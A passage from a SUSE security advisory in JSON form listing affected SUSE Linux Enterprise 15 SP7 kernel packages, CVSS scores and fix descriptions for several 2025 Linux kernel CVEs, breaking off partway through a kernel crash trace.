"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 